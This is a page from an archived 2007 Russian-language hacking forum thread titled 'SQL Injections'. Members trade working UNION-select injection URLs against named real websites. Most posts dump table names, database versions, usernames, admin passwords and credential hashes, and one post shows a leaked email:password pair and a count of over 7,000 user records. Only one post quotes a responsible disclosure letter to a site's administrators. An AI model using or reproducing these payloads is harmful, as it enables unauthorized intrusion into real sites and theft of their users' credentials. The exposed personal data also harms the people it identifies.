HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 311 из 1602 « Первая < 211261301 307 308 309 310 311 312 313 314 315 3213614118111311 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.09.2007, 21:51
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
Цитата:
Сообщение от mister  
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
раскрутил:

Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+66,1/*
такбличка юзерс.

колумны:

username:
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+9,1/*
pword:
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+10,1/*
вывод:... только почемуто пусто... мб ни 1 юзера?
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
 
Ответить с цитированием

  #2  
Старый 25.09.2007, 22:13
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Цитата:
Сообщение от BlackCats  
вывод:... только почемуто пусто... мб ни 1 юзера?
Код:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
Пусто у тебя в голове))

Код:
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,concat(username,char(58),pword),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Получаем:

faridah94@hotmail.com:faridah94@hotmail.com

и т.д. записей много:

Код:
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,count(concat(username,char(58),pword)),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Записей: 7461
 
Ответить с цитированием

  #3  
Старый 25.09.2007, 22:15
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию
Объяснял новечку скули и случайно наткнулся на .edu :

Код:
http://www.antioch-college.edu/news/releases/index.php?id=-178%20UNION%20SELECT%201,2,user(),version(),database(),6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #4  
Старый 25.09.2007, 22:24
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию
otdohni.ws
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat(table_name,0x3a,column _name),3,4,5+from+information_schema.columns/*

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_password, user_name,user_loginname,user_email),3,4,5+from+de nisvd_db01.e107_user/*

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,ID_MEMBER,real Name,memberName,memberIP,memberIP2,MSN,emailAddres s,hideEmail,YIM,AIM,ICQ,passwd,passwordSalt),%27CR ACKed%20by%20fobofob%27,4,5+from+doctor_forum.back up_smf_members+limit+115,1/*

а вот тут не понял что за странность с лимитом

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users/*

дальше не рыл...
 
Ответить с цитированием

  #5  
Старый 26.09.2007, 09:35
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
а вот тут не понял что за странность с лимитом

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users /*
пользуй тогда не лимит, а where
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6  
Старый 26.09.2007, 17:54
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
http://stepbystep.htmlbook.ru/?id=24+UNION+SELECT+1,2,3/*
Смотрим в самый низ, там где каменты, там наше "блюдо"
Версия 4 какие могут быть имена таблиц на HTML мануале, незнаю...
 
Ответить с цитированием

  #7  
Старый 26.09.2007, 19:07
I0gen
Познающий
Регистрация: 15.08.2007
Сообщений: 97
Провел на форуме:
366486

Репутация: 100
По умолчанию
http://poderedomex.com/notas.asp?nota_id=1+and+1=convert(int,@@version)--

http://www.yard-saler.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.e商店.com/en/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.adsjax.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.imadspace.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://racecarbroker.net/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
 
Ответить с цитированием

  #8  
Старый 27.09.2007, 02:52
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию
Письмо админам ресурса.. было отправлено более недели назад

Цитата:
Здравствуйте, уважаемые!

Довожу до Вашего сведения, что в вашем движке, которому соответствет URL
job.i-files.org, мною обнаружена уязвимость класса SQL-Injection,
позволяющая выполнить произвольный SQL-запрос в базе данных приложения с правами соответствующего пользователя. Пример уязвимости:

1)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,%20version(),%20user(),%20databa se()),16,17,18,19,20,21,22,23,24/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2&currency=0&last_s_id=0
'

5.0.32-Debian_7etch1-log:job@mail.101.com.ua:job

2)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,table_name,table_schema),16,17,1 8,19,20,21,22,23,24+from+information_schema.tables +where+table_name+like+'%25user%25'/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2&currency=0&last_s_id=0
'

ну и так далее)

Прощу принять во внимание предоставленную информацию, и принять меры к
устранению уязвимости пока это не привело к плачевным результатам.

з.ы. админы уведомлены
 
Ответить с цитированием

  #9  
Старый 27.09.2007, 18:52
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию
Код:
http://www.translation.net/kb/index.php?ToDo=browse&catId=-10+union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #10  
Старый 27.09.2007, 21:35
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
Код:
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
bpmsIt3@localhost:4.1.22-log:bpmSite
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6/*
eunews@localhost:5.0.41-Debian_1-log:eunews
Код:
http://www.humboldt.org.ni/publicaciones.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*
humboldt_admin@localhost:4.1.22-standard:humboldt_cms
Код:
http://www.sandra-kuehn.de/aquarium/pics.php?id=9999+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
Код:
http://www.apotheose.net/pics.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database())/*
user09710@web04:4.1.20-log:db0971002
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
ipetra_ru@localhost:5.0.32-Debian_7etch1-log:ipetra_ru
Код:
http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/*
Код:
http://www.sws-yachts.com/pics.php?pagina=fotoboatyard&Id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
sws-yachts@localhost:4.1.20:sws-yachts
 
Ответить с цитированием
Ответ
Страница 311 из 1602 « Первая < 211261301 307 308 309 310 311 312 313 314 315 3213614118111311 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ